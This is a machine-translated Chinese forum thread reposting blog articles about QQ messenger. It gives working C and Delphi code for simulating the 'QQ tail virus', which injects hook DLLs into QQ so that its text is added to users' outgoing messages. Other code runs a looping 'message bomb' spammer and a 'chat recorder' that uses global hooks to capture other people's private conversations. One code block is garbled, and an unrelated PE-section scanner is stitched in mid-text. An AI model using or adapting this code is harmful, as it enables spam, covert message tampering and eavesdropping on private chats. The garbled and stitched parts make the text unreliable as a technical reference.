First, a brief introduction to hooks; readers already familiar with hooks can skip this paragraph. A so-called Win32 hook is not an iron-hook artificial arm, but a subroutine that can be used to monitor specific messages in the system and carry out specific functions. By analogy, your program is the emperor and the Windows system acts as the governors of the provinces; the hook can be thought of as an imperial envoy. For example, the emperor orders taxes to be collected nationwide, and then sends an envoy to find the governor of Shanxi and say: "By the emperor's decree, in addition to the normal taxes, Shanxi is to add ten jars of Xinghua Village wine." (-_-#...) Just as the emperor can use this method, the programmer can use hooks to capture specific messages in the Windows system.

Applied to the "QQ tail virus", the problem is this: we need a hook that pastes our text when the user clicks the "Send" button. The hook procedure I implemented is as follows (how the hook is installed is explained later):

// Hook process, monitor the "send" command message

LResult Callback CallWndProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)

{

CWPSTRUCT * P = (cwpstruct *) LPARAM;

// Capture the "Send" button

IF (P-> Message == WM_Command && Loword (P-> wparam) == 1)

Pastetext (g_hrich);

Return CallNexthookex (G_HProc, Ncode, WPARAM, LPARAM);

}

A few notes on this callback procedure:

1. lParam is a pointer to a CWPSTRUCT structure, which is defined as follows:

typedef struct {
    LPARAM lParam;
    WPARAM wParam;
    UINT message;
    HWND hwnd;
} CWPSTRUCT, *PCWPSTRUCT;

At this point, SDK fans like me may smile knowingly: are these not the four core parameters of a window callback? Just so; you could even write the hook function with switch (p->message) { /* ... */ } and take over the QQ window completely.

2. g_hrich is a global variable that holds the handle of the QQ message text box. A global variable is used here because this handle cannot be obtained from the parameters of the keyboard hook callback function. How to get this handle, and the special location of this global variable, are explained later.

3. CallNextHookEx calls the next procedure in the hook chain. In terms of the analogy, the imperial envoy says that his own errand is done and hands over to the governor. (-_-#...) This is a very important part of writing a hook function. If this line is omitted, it may cause an error in the system's hook chain and some programs will stop responding; in fact, while I was writing this simulation program, QQ stopped responding several times.

4. You may ask why I capture the WM_COMMAND message. Let me explain with the following SDK code (QQ is written with MFC, but only SDK code makes the relationship between WM_COMMAND and the "Send" button clear):

#define IDC_BTN_SENDMSG 1 // ID of the "Send" button

// QQ "Send Message" dialog procedure (forged by Li Ma)
LRESULT CALLBACK ProcSendDlg(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
{
    switch (msg)
    {
    case WM_CLOSE:
        EndDialog(hDlg, 0);
        break;
    case WM_COMMAND:
        {
            switch (LOWORD(wParam))
            {
            case IDC_BTN_SENDMSG:
                // send the message ...
                break;
            // handling of the other command buttons ...
            }
        }
        break;
    // other cases ...
    }
    return 0;
}

The whole sending process is: when the user clicks the "Send" button, the parent window of this button (that is, the "Send Message" dialog box) receives a WM_COMMAND notification message in which the low word of wParam (i.e. LOWORD(wParam)) is the ID of this button, and then the sending part of the code is called. This process is as follows:

So capturing the WM_COMMAND message here is much more effective than capturing other messages or installing a mouse hook.

OK, now this hook can do its job. But please don't forget: more users prefer to send messages with the "Ctrl+Enter" hotkey, so the program also needs to install a keyboard hook:

// Keyboard hook procedure: monitors the "send" hotkey
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    // Capture the hotkey
    if (wParam == VK_RETURN && GetAsyncKeyState(VK_CONTROL) < 0 && lParam >= 0)
        PasteText(g_hRich);
    return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}

The only thing that needs explaining here is the lParam >= 0 clause. Obviously this if statement checks for the Ctrl+Enter hotkey, so what is lParam >= 0 for? In the keyboard hook callback, lParam is a very important parameter that contains the keystroke's repeat count, scan code, extended-key flag and so on. The highest bit of lParam (0x80000000) indicates whether the key is currently being pressed: the bit is 0 if the key is being pressed and 1 otherwise. So lParam >= 0 means PasteText is called on WM_KEYDOWN; if this condition is removed, PasteText is called twice (once more along with WM_KEYUP).

Installing the hooks and finding the window

The next step is how to install these two hooks. The questions to answer are: where is the hook installed, and how?

The target of the hooks is of course the thread that owns the QQ "Send Message" window. My code takes the handle of this window and installs the hooks:

// Install the hooks (hQQ != NULL) or remove them (hQQ == NULL)
BOOL WINAPI SetHook(HWND hQQ)
{
    BOOL bRet = FALSE;
    if (hQQ != NULL)
    {
        DWORD dwThreadID = GetWindowThreadProcessId(hQQ, NULL);
        // Thanks for the lookup code, which saved me the trouble of using Spy
        g_hRich = GetWindow(GetDlgItem(hQQ, 0), GW_CHILD);
        if (g_hRich == NULL)
            return FALSE;
        // Install the hooks
        g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
        g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
        bRet = (g_hProc != NULL) && (g_hKey != NULL);
    }
    else
    {
        // Remove the hooks
        bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
        g_hProc = NULL;
        g_hKey = NULL;
        g_hRich = NULL;
    }
    return bRet;
}

At this point, all of the code above lives in the dynamic-link library hook.dll. I will not introduce DLLs here; please refer to the relevant material on MSDN and the source code that accompanies this article.

All the important work is already done in the DLL (in fact this part of the work can only be done by a DLL, which is dictated by the Windows virtual memory mechanism), so the EXE only needs to call the exported SetHook function. So how is the parameter of SetHook obtained? Please see the following code:

// Thanks for the lookup code, which saved me the trouble of using Spy
HWND hSend;
g_hQQ = NULL;
SetHook(NULL);
do
{
    g_hQQ = FindWindowEx(NULL, g_hQQ, "#32770", NULL);
    hSend = FindWindowEx(g_hQQ, NULL, "Button", "Send(&S)");
} while (g_hQQ != NULL && hSend == NULL);
if (g_hQQ != NULL)
    SetHook(g_hQQ);

The do-while loop in this code finds the "Send Message" window. QQ windows are becoming more and more concealed, with windows nested layer inside layer, which makes them very inconvenient to find, so I thank my friend Hottey for his article on the "QQ message bomb", which saved me the trouble of using Spy. All I did was translate the Delphi code in his article into C code.

The DLL shared data segment

If you don't know much about DLLs, then after reading my accompanying source code you will certainly have some questions about the following code:

// Define the shared data segment
#pragma data_seg("Shared")
HHOOK g_hProc = NULL; // window procedure hook handle
HHOOK g_hKey = NULL;  // keyboard hook handle
HWND g_hRich = NULL;  // text box handle
#pragma data_seg()
#pragma comment(linker, "/section:Shared,rws")

This defines a shared data segment, as my comments already make clear. But what is the shared data segment for? Before answering this question, I invite you to comment out the preprocessor directives in this code, recompile the DLL and run it. What do you find?

Yes, adding the tail fails!

OK, let me explain. The EXE, the DLL and QQ in this simulation program are actually related as follows:

This DLL has to map one instance into the EXE's address space so that the EXE can call it, and map another instance into QQ's address space to do the hook's work. That is, once the hooks are installed there are two instances of the DLL among the modules of the whole system! This DLL is not that DLL, so there is no connection between them. Take the global variable g_hRich: the DLL on the left of the figure obtained the text box handle passed in from the EXE, but without the shared section g_hRich would still be NULL in the DLL on the right. This is the point of the shared section: it maintains the link between the EXE, the DLL and QQ. It is a bit like a static member variable in C++.

After the hooks are installed, you can look with a process manager that has a module view, and you will find that hook.dll is also among the modules of QQ.EXE.

Some final remarks

1. As I said before, I met this virus in January 2003. I still remember that the virus EXE was only 16 KB in size, so given the nature of the virus itself, it would be more practical to write this thing with Win32ASM.

2. I once removed that virus by hand, using a process viewer tool. But the "QQ tail" has since gained a resurrection feature: after the EXE is killed, the DLL wakes it up again. I analysed it with my process viewer tool and found that almost all processes in the system had the virus's DLL attached. The technique is to use CreateRemoteThread to insert an additional resurrection thread into every process, which really kills two birds with one stone: it guarantees that the EXE is always running, and a DLL that is in use cannot be deleted. I have already implemented this technique, but its stability is far from that of the virus itself, so I do not write it up here; interested friends can refer to the relevant chapter of Jeffrey Richter's "Windows Core Programming".

3. As I put down my pen, I remember a line from "STL source analysis": "The source code has no secret." If you have this feeling after reading this article, then I will feel lucky.


Author blog: http://blog.9cbs.net/titilima/
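The shared section that the article declares with /section:Shared,rws is recorded in the DLL's PE section table, so it can be looked for when triaging an unknown DLL. As an added example (not code from the original article), this C sketch walks a PE section table and reports sections that are both shared and writable; the sample image is a constructed, header-only buffer and the function names are illustrative.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Section characteristic flags from the PE/COFF format. */
#define SCN_MEM_SHARED 0x10000000u
#define SCN_MEM_WRITE  0x80000000u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Counts sections that are shared AND writable. The name of the first hit is
 * copied to first_name (9 bytes). Returns -1 if the headers are malformed. */
int find_shared_writable(const uint8_t *img, size_t len, char first_name[9]) {
    first_name[0] = '\0';
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return -1;
    uint32_t pe = rd32(img + 0x3C);                 /* e_lfanew */
    if (pe > len || len - pe < 24 || memcmp(img + pe, "PE\0\0", 4) != 0) return -1;
    uint16_t nsec = rd16(img + pe + 6);             /* NumberOfSections */
    uint16_t optsz = rd16(img + pe + 20);           /* SizeOfOptionalHeader */
    size_t table = (size_t)pe + 24 + optsz;         /* section table follows it */
    if (table > len || (len - table) / 40 < nsec) return -1;
    int hits = 0;
    for (uint16_t i = 0; i < nsec; i++) {
        const uint8_t *sh = img + table + (size_t)i * 40;
        uint32_t ch = rd32(sh + 36);                /* Characteristics */
        if ((ch & SCN_MEM_SHARED) && (ch & SCN_MEM_WRITE)) {
            if (hits == 0) { memcpy(first_name, sh, 8); first_name[8] = '\0'; }
            hits++;
        }
    }
    return hits;
}

/* Constructed sample: DOS stub, PE signature, COFF header, a zeroed optional
 * header and a section table. No section data; this is not a loadable DLL. */
size_t build_sample(uint8_t *buf, size_t cap, int with_shared) {
    static const struct { const char *name; uint32_t ch; } secs[] = {
        { ".text",  0x60000020u },  /* code, execute, read */
        { ".data",  0xC0000040u },  /* initialized data, read, write */
        { "Shared", 0xD0000040u },  /* initialized data, read, write, shared */
    };
    uint16_t n = with_shared ? 3 : 2;
    size_t table = 0x40 + 24 + 0xE0;
    size_t total = table + (size_t)n * 40;
    if (cap < total) return 0;
    memset(buf, 0, total);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, 0x40);
    memcpy(buf + 0x40, "PE\0\0", 4);
    wr16(buf + 0x46, n);
    wr16(buf + 0x54, 0xE0);
    for (uint16_t i = 0; i < n; i++) {
        uint8_t *sh = buf + table + (size_t)i * 40;
        memcpy(sh, secs[i].name, strlen(secs[i].name));
        wr32(sh + 36, secs[i].ch);
    }
    return total;
}

int main(void) {
    uint8_t buf[512];
    char name[9];
    size_t n = build_sample(buf, sizeof buf, 1);
    int hits = find_shared_writable(buf, n, name);
    printf("shared+writable sections: %d (first: %s)\n", hits, name);
    return 0;
}
```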


#

Reply: QQ information

2004-10-20 2:47 PM

Bing314

http://dev.9cbs.net/develop/Article/22/22661.shtm

Title Making QQ Message Bomb Select from Hottey Blog

Keyword QQ

Somewhere

QQ chat robot

Original: Hottey

A few days ago I saw an article in a magazine on developing a QQ chat robot. The part about sending QQ messages in a loop seemed like a lot of fun, so I took the Delphi road and started on my own QQ chat robot.

First of all, we must understand what has to be done. Everyone has used QQ and knows the whole process of sending a message to someone! To send messages in a loop, the following conditions must be met:

1. It must be done in chat mode, so that the text box is still there after a message is sent and the QQ window still exists.

2. Next, find the handle of the QQ text input window.

3. Paste what you want to say into the QQ text input window, then have the program click the Send button itself.

The idea is very simple, so let's start implementing it.

First, finding the handle of the QQ text input window. I used Spy to view the QQ window, and the result is as follows: so the path is clear. To find the handle of the QQ text input window, you have to find its parent: handle 00620252, class name AfxWnd42, control ID 00000000. And to find that, you must first find the QQ message dialog box.

Several API functions are used here:

1. FindWindowEx(
    hWnd1: Long,   // Parent window whose child windows are searched; 0 means the desktop window (top-level windows are normally considered child windows of the desktop)
    hWnd2: Long,   // The search starts after this window; 0 means start from the first child window.
    lpsz1: String, // Class name to search for; 0 means ignored.
    lpsz2: String  // Window name (title) to search for; 0 means ignored.
);

2. GetWindow(
    hWnd: Long,    // Source window.
    wCmd: Long     // Relationship between the result window and the source window (here GW_CHILD, the first child window of the source window).
);

3. GetDlgItem(
    hWnd: Long,        // Handle of the source window.
    nIDDlgItem: Int    // ID of the control to find
);

In fact, when I first started looking for the QQ dialog window, I first thought of FindWindow(). This function finds a window handle directly by the window title.

This is how I looked for it:

var hParent: HWND;
hParent := FindWindow(nil, 'Sending Information'); // This is still very effective in 2003, but it is an error. Why?

Later I found that the title of every QQ2003 window changes. As in the figure above it is "Cold as a meal - send a message"; if you send a message to another person, it becomes "blue wind - send message" (for example).

This may be a security measure taken by QQ2003! Ha ha! You may have seen message bomb tools on the Internet that sometimes ask you to enter the other party's nickname (so that the window handle is easy to get through the nickname).

But is there a better way? There is! Use FindWindowEx(). Look closely at its parameters; the key is the second one, hWnd2: with it we can call FindWindowEx repeatedly to find the child windows that qualify. The following is my code:

var hParent: HWND; // Global variable that records the window handle found by each call to FindWindowEx().

procedure TForm1.FormCreate(Sender: TObject);
begin
  hParent := 0; // Initialize: start from the first top-level window of the desktop.
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var hButton, hButton1: HWND;
begin
  repeat
    // The QQ dialog class is #32770. Calling FindWindowEx() in a loop updates hParent each time
    // the timer fires and continues the search after the previous hParent window.
    hParent := FindWindowEx(0, hParent, '#32770', nil);
    // Check whether the 'Send(&S)' button exists in the window found; if it does, this is the right QQ dialog.
    hButton := FindWindowEx(hParent, 0, nil, 'Send(&S)');
  until hButton <> 0; // QQ dialog found, leave the loop.
  // With the QQ dialog found, look up the handle of the chat mode button.
  hButton1 := FindWindowEx(hParent, 0, nil, 'chat mode(&T)');
  if hButton1 <> 0 then // If the chat mode button is present, the QQ window is in message mode.
    SendMessage(hButton1, BM_CLICK, 0, 0); // Click the chat mode button to switch the window to chat mode.
end;

So we have successfully found the QQ dialog box and switched it to chat mode. The first task is finally done, heh! The more frustrating part is still to come.

Next, finding the handle of the QQ text input window, this time with GetDlgItem(). As everyone knows, the control ID of a given control in a window is constant for that window class (apart from some static controls). Through Spy I learned that the control ID of the QQ text input window is 0000037E. So I wrote the following statement.

var hMemo: HWND;
hMemo := GetDlgItem(hParent, $0000037E);

It turned out to have no effect; things did not go as I expected. Ha ha! I picked up Spy again and found that more than one control has the ID 0000037E, and the QQ text input window we want is not the first of them (if it were the first, the statement above would work ^_^). Frustrating, isn't it? No way around it: start from its parent! It cannot be obtained in one step. Looking more closely, I found it: handle 00620252, class name AfxWnd42, control ID 00000000 is the parent of the QQ text input window, and it is the first of all the windows with class name AfxWnd42. So we can find its handle; it can't get away. With it, the handle of the QQ text input window is very easy to find, haha! The following is my code:

var hMemo, hMemo1: HWND;
hMemo := GetDlgItem(hParent, $00000000); // Find the parent.
hMemo1 := GetWindow(hMemo, GW_CHILD); // Get the first child window under the parent (hMemo1 is the handle of the QQ text input window)

By the way, a word on using GetWindow():

GetWindow(
    hWnd: Long, // Source window handle.
    wCmd: Long  // Relationship between the result window and the source window. (GW_CHILD is the first child window under the source window)
)

For more relationship constants, go and look at MSDN! No need to take up the space of the cold spring here.

At this point we have both the handle of the QQ dialog and the handle of the QQ text input window. The remaining steps are to put the words you want to say into the QQ text input window and click Send, and you will annoy others!

I post my code here for your reference:

procedure TForm1.FormCreate(Sender: TObject);
begin
  i := 0;
  // Load the file content into the ComboBox control.
  ComboBox1.Items.LoadFromFile(ExtractFilePath(Application.ExeName) + 'text.txt');
  ComboBox1.Text := ComboBox1.Items.Strings[0];
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var hMemo1: HWND; // hMemo1 is the handle of the QQ text input box found earlier
begin
  if CheckBox1.Checked then // The "send in a loop" check box is ticked.
  begin
    if i > ComboBox1.Items.Count - 1 then
      i := 0;
    Edit1.Text := ComboBox1.Items.Strings[i];
    Edit1.SelectAll;
    Edit1.CopyToClipboard; // Copy to the clipboard
    SendMessage(hMemo1, WM_PASTE, 0, 0); // Send a paste message to the QQ text input window.
    SendMessage(hButton, BM_CLICK, 0, 0); // Click the Send button
    i := i + 1;
  end;
  if CheckBox1.Checked = False then // The "send in a loop" check box is not ticked.
  begin
    Edit1.Text := ComboBox1.Text;
    Edit1.SelectAll;
    Edit1.CopyToClipboard;
    SendMessage(hMemo1, WM_PASTE, 0, 0);
    SendMessage(hButton, BM_CLICK, 0, 0);
  end;
end;

A brief note: because my knowledge is limited, I don't know how to copy a known string to the clipboard with the clipboard functions, so I can only borrow a control. All text controls have a method for this, namely Edit1.CopyToClipboard, so I simply make Edit1 an invisible control. Each time, the content to be sent is passed to Edit1, and then the content of Edit1 is copied with CopyToClipboard. This is just a workaround. If you know a better way, I hope you will tell me, heh!

Postscript:

The above code is for the QQ2003 version. Although there is a good tool for wavering thousands of capping. But as a small rookie. But I like to be programmed. Doing it yourself, DIY (Do It Yourself), is also a very cool thing! I also referred to the waver of the waves, I feel that it has its function! not bad. In fact, there is not much technical content, just a few API functions. I only hope that friends who have just started learning Delphi find it helpful. Of course, masters have no need for it.

Note: QQ2004 has some changes. For convenience I post my new code:

procedure TForm1.Timer1Timer(Sender: TObject);
var hButton, hButton1, hMemo, hMemo1, hParent1: HWND;
begin
  repeat
    hParent := FindWindowEx(0, hParent, '#32770', nil);
    // QQ2004 needs the following extra statement: there is one more layer above the memo
    hParent1 := FindWindowEx(hParent, 0, '#32770', nil);
  until hParent1 <> 0;
  hButton := FindWindowEx(hParent1, 0, nil, 'Send(&S)');
  hButton1 := FindWindowEx(hParent1, 0, nil, 'chat mode(&T)');
  if hButton1 <> 0 then
    SendMessage(hButton1, BM_CLICK, 0, 0);
  hMemo1 := GetDlgItem(hParent1, $000000);
  hMemo := GetWindow(hMemo1, GW_CHILD);
  if hMemo <> 0 then
  begin
    if CheckBox1.Checked then
    begin
      if i > ComboBox1.Items.Count - 1 then
        i := 0;
      Edit1.Text := ComboBox1.Items.Strings[i];
      Edit1.SelectAll;
      Edit1.CopyToClipboard;
      SendMessage(hMemo, WM_SETTEXT, 0, 0);
      SendMessage(hMemo, WM_PASTE, 0, 0);
      SendMessage(hButton, BM_CLICK, 0, 0);
      i := i + 1;
    end;
    if CheckBox1.Checked = False then
    begin
      Edit1.Text := ComboBox1.Text;
      Edit1.SelectAll;
      Edit1.CopyToClipboard;
      SendMessage(hMemo, WM_SETTEXT, 0, 0);
      SendMessage(hMemo, WM_PASTE, 0, 0);
      SendMessage(hButton, BM_CLICK, 0, 0);
    end;
  end;
end;

If you have a friend, please go to my website to download (in my work): Author website: http://asp.itdrp.com/hottey

Hottey modified in 2004-5-30

Author Blog: http://blog.9cbs.net/Hottey/


#

Reply: QQ information

2004-10-20 2:58 PM

Bing314

http://dev.9cbs.net/develop/Article/22/22273.shtm

Another implementation of the title QQ tail virus Select from Myling Blog

Keyword QQ tail virus

Somewhere

A few days ago I saw that brother Wuqiu had simulated the QQ tail virus.

I think finding the window by its title is not very general.

Going back to look with Spy, it turns out the QQ window structure is like this:

Here #32770 (dialog box) is the pop-up QQ chat window; its internal controls are as shown in the figure above: Static (label), Button, AfxWnd42 (I guess this is something like a Panel container) and RichEdit (this is where our chat text is shown).

I won't go into the detailed layout; open Spy and it is clear at a glance.

Of these we use only two controls, as shown below:

The first part is the handle, the middle is the caption, and the last part is the class name.

For example: 05240258 ~ Send(&S) ~ Button

is the Send button, with handle 05240258.

OK, knowing this, what I have to do is very simple.

All the code is as follows:

procedure TForm1.Timer1Timer(Sender: TObject);
var
  hMemo, hRichEdit, hWindow, hButton: THandle; // handle variables
  szText: array[0..255] of Char; // text read from the window
  MyText: string; // text to send
begin
  hWindow := 0; // start from zero, i.e. traverse from the first child window
  while True do
  begin
    // Find a window of class #32770 (dialog)
    hWindow := FindWindowEx(0, hWindow, '#32770', nil);
    if hWindow <> 0 then
    begin
      // Find the AfxWnd42 window (I guess this is something like a Panel container)
      hMemo := FindWindowEx(hWindow, 0, 'AfxWnd42', nil);
      if hMemo <> 0 then
      begin
        // Find the RichEdit window
        hRichEdit := FindWindowEx(hMemo, 0, 'RichEdit', nil);
        if hRichEdit <> 0 then
        begin
          // Write whatever you like here, hehe
          MyText := 'Ade is a big handsome guy, 嘿嘿';
          // Send a message to get the text in QQ
          SendMessage(hRichEdit, WM_GETTEXT, 256, Integer(@szText[0]));
          // Append our own text
          MyText := szText + MyText;
          // Send it to QQ
          SendMessage(hRichEdit, WM_SETTEXT, 256, Integer(MyText));
          // Find the Send button
          hButton := FindWindowEx(hWindow, 0, 'Button', 'Send(&S)');
          // Send a click message to send
          SendMessage(hButton, BM_CLICK, 0, 0);
          // Exit the loop. If this statement is removed, every open QQ window gets the text;
          // otherwise only the frontmost QQ window does.
          Break;
        end;
      end;
    end;
  end;
end;

This is only a guess at how the QQ tail works, and much of it is unsatisfactory: for example, the text is displayed in QQ before it is sent. One would only need to intercept the message and then quietly send it on, and nobody would notice a thing.

Author blog: http://blog.9cbs.net/myling/


#

Reply: QQ information

2004-10-20 3:41 PM

Bing314

http://dev.9cbs.net/develop/Article/22/Article/28/28554.shtm

Title QQ Chat Recorder Demo Select BLOG from Hottey

Keyword QQ, hook, DLL

Somewhere

QQ chat logger demo (can be for QQ2003 and QQ2004 versions)

Note: This article may not have the content you need (the technology in it is not new, just some simple implementation), so you can skip it; if I waste your precious time, I will be deeply uneasy.

Author's website: http://asp.itdrp.com/hottey ---------------- Hottey

Hey! It's hard to get a bit of free time. Now I have time to post the QQ chat recorder I made the other day and share it with everyone. I wrote this program after seeing a recent piece of software online called QQAUTOREORDER. What it does is record QQ chats. The technique it uses is hooking the QQ dialog. It does not record QQ messages that the user has not clicked open. (I think that to record those, that is, to record QQ messages without waiting for the QQ message box, one can only intercept QQ's data packets. I spent a day on this, but the final conclusion was "too powerless" ^_^ It seems QQ's data packets are not so easy to get.)

Back to the subject: this article uses the method of hooking the QQ message box (first, it is easier to implement; second, it is the approach most such programs take). To simplify, I divide the program into two parts (both implemented on QQ2004, with the final version compatible with QQ2003):

I. Capturing messages that others send to you:

Since we are hooking QQ's message box, the natural thing is to find the most reasonable and convenient hook. Think about how you view QQ messages: viewing one generally causes a QQ message window to be created, which produces a create event. From this point of view it is wise to use a WH_SHELL hook.

WH_SHELL is described as: monitors Windows shell notification messages, such as the creation and destruction of top-level windows. What we care about is the window creation message.

Because several QQ message windows can appear at once, I use a global hook here and define the following data structure:

HookType.pas unit

unit HookType;

interface

uses
  Windows, Messages;

const
  WM_USERCMD = WM_APP + 1;    // user-defined application-level message
  UC_WINCREATE = WM_APP + 2;  // QQ message window created
  UC_WINDESTROY = WM_APP + 3; // QQ message sent
  BUFFER_SIZE = 16 * 1024;
  HOOK_MEM_FILENAME = 'MEM_FILE';

type
  TShared = record
    KeyHook: HHOOK;   // keyboard hook
    ShellHook: HHOOK;
    CallHook: HHOOK;
    MainWnd: THandle; // handle of the main form (not Application.Handle)
    Moudle: THandle;  // DLL module handle
  end;
  PShared = ^TShared;

implementation

end.

DLL unit code

var
  MemFile: THandle;
  Shared: PShared;

function ShellProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
begin
  case iCode of
    HSHELL_WINDOWCREATED:
      // Post the custom message WM_USERCMD to the demo program.
      // wParam specifies the handle of the window being created or destroyed.
      PostMessage(Shared^.MainWnd, WM_USERCMD, UC_WINCREATE, wParam);
  end;
  Result := CallNextHookEx(Shared^.ShellHook, iCode, wParam, lParam);
end;

function InstallHook: Boolean;
begin
  Shared^.Moudle := GetModuleHandle(PChar('QQHOOK')); // QQHOOK is the name of my DLL file.
  Shared^.ShellHook := SetWindowsHookEx(WH_SHELL, @ShellProc, Shared^.Moudle, 0);
  if Shared^.ShellHook = 0 then
  begin
    Result := False;
    Exit;
  end;
  Result := True;
end;

{ Remove the hook filter function }
function UninstallHook: Boolean;
begin
  FreeLibrary(Shared^.Moudle);
  Result := UnhookWindowsHookEx(Shared^.ShellHook);
  UnmapViewOfFile(Shared);
  CloseHandle(MemFile);
end;

procedure DllEntry(dwReason: Integer);
begin
  case dwReason of
    DLL_PROCESS_ATTACH:
      begin
        MemFile := OpenFileMapping(FILE_MAP_WRITE, False, HOOK_MEM_FILENAME);
        if MemFile = 0 then
          MemFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShared), HOOK_MEM_FILENAME);
        Shared := MapViewOfFile(MemFile, FILE_MAP_WRITE, 0, 0, 0);
      end;
    DLL_PROCESS_DETACH:
      begin
        // UninstallHook;
      end;
  else
    ;
  end;
end;

exports
  InstallHook;

begin
  DllProc := @DllEntry;
  DllEntry(DLL_PROCESS_ATTACH);
end.

// The code above does not unload the hook gracefully; that is outside the scope of this discussion.

Demo program code

procedure TForm1.Button1Click(Sender: TObject);
begin
  InstallHook;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
  MemFile := OpenFileMapping(FILE_MAP_WRITE, False, HOOK_MEM_FILENAME);
  if MemFile = 0 then
    MemFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShared), HOOK_MEM_FILENAME);
  Shared := MapViewOfFile(MemFile, FILE_MAP_WRITE, 0, 0, 0);
  Shared^.MainWnd := Handle; // save the form handle
end;

// Window message handler
procedure TForm1.WndProc(var Msg: TMessage);
begin
  with Msg do
  begin
    if Msg = WM_USERCMD then // custom message sent by the DLL
    begin
      case wParam of
        UC_WINCREATE: // QQ message box created
          begin
            GetText(FindHWD(HWND(lParam))); // get the text in the QQ message box
          end;
      end;
    end;
  end;
  inherited;
end;

// Find the QQ window handle from the wParam parameter
function TForm1.FindHWD(Parent: HWND): HWND;
var
  hwd, hBtn, hMemo: HWND;
begin
  Result := 0;
  hwd := FindWindowEx(Parent, 0, '#32770', nil); // QQ second-level window handle; QQ2003 and earlier versions do not have this.
  if (hwd <> 0) then
  begin
    hBtn := FindWindowEx(hwd, 0, nil, 'back message(&R)'); // its presence proves this is a received QQ message box.
    if (hBtn <> 0) then
    begin
      hMemo := GetDlgItem(hwd, $00000380); // RichEdit handle; the QQ message is here.
      if (hMemo <> 0) then
        Result := hMemo;
    end;
  end;
end;

// Get the text of the control with the given handle.
procedure TForm1.GetText(hwd: HWND);
var
  Ret: LongInt;
  QQText: PChar;
  Buf: Integer;
begin
  GetMem(QQText, 1024);
  if (hwd <> 0) then
  begin
    try
      Ret := SendMessage(hwd, WM_GETTEXTLENGTH, 0, 0) + 1;
      Buf := LongInt(QQText);
      SendMessage(hwd, WM_GETTEXT, Min(Ret, 1024), Buf);
      Memo1.Lines.Add(QQText); // show the text in the Memo
    finally
      FreeMem(QQText, 1024);
    end;
  end;
end;

The above is my test code; I separated it out only for convenience of organisation. There may be some unreasonable places in it. The full code is available for download, as noted below.

Hottey on 2005-6-2 website: http://asp.itdrp.com/hottey

Author blog: http://blog.9cbs.net/hottey/

#

Reply: QQ information

2004-10-20 3:42 PM

Bing314

Http://dev.9cbs.net/develop/Article/22/Article/28/28576.shtm

Title QQ Chat Recorder Demo (2) Select Blog from Hottey

Keyword QQ, hook, DLL

Somewhere

Building on the previous article, this one describes how to capture the messages you send yourself:

// hottey from 2004-6-2

QQ sends a message from the local machine in one of two ways: (1) pressing the Send button, or (2) pressing the Ctrl+Enter keys. Custom hotkeys, of course, are outside the scope of this article.

Based on these two ways I chose two hooks: WH_CALLWNDPROC and WH_KEYBOARD. Sorry, my mood is too bad today (some trivial things at school) and my heart really isn't in it, so I will just post the source code. Those who are interested can study it themselves... If there are any problems, you can contact me at Delphi21@163.com

// Monitor the Ctrl+Enter key combination
function KeyboardProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
begin
  if (wParam = VK_RETURN) and (GetKeyState(VK_CONTROL) < 0) and (lParam >= 0) then
  begin
    SendMessage(Shared^.MainWnd, WM_USERCMD, UC_WINDESTROY, GetForegroundWindow);
  end;
  Result := CallNextHookEx(Shared^.KeyHook, iCode, wParam, lParam);
end;

// Monitor the "Send" button
function CallWndProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
type
  Msg = ^CWPSTRUCT;
var
  p: Msg;
begin
  p := Msg(lParam);
  // Only the foreground window is handled
  if (p^.message = WM_COMMAND) and (LOWORD(p^.wParam) = 1) then
  begin
    SendMessage(Shared^.MainWnd, WM_USERCMD, UC_WINDESTROY, GetForegroundWindow);
  end;
  Result := CallNextHookEx(Shared^.CallHook, iCode, wParam, lParam);
end;

Demo program related code:

procedure TForm1.WndProc(var Msg: TMessage);
begin
  with Msg do
  begin
    if Msg = WM_USERCMD then
    begin
      case wParam of
        UC_WINDESTROY:
          begin
            GetText(FindHWD(HWND(lParam)));
          end;
      end;
    end;
  end;
  inherited;
end;

function TForm1.FindHWD(Parent: HWND): HWND;
var
  hwd, hBtn, hMemo: HWND;
begin
  hwd := FindWindowEx(Parent, 0, '#32770', nil);
  Result := 0;
  if (Parent <> 0) then
  begin
    hBtn := FindWindowEx(hwd, 0, nil, 'Send(&S)');
    if (hBtn <> 0) then
    begin
      hMemo := GetDlgItem(hwd, $000000);
      if (hMemo <> 0) then
      begin
        Result := GetWindow(hMemo, GW_CHILD);
      end;
    end;
  end;
end;

procedure TForm1.GetText(hwd: HWND);
var
  Ret: LongInt;
  QQText: PChar;
  Buf: Integer;
begin
  GetMem(QQText, 1024);
  if (hwd <> 0) then
  begin
    try
      Ret := SendMessage(hwd, WM_GETTEXTLENGTH, 0, 0) + 1;
      Buf := LongInt(QQText);
      SendMessage(hwd, WM_GETTEXT, Min(Ret, 1024), Buf);
      Memo1.Lines.Add(QQText);
    finally
      FreeMem(QQText, 1024);
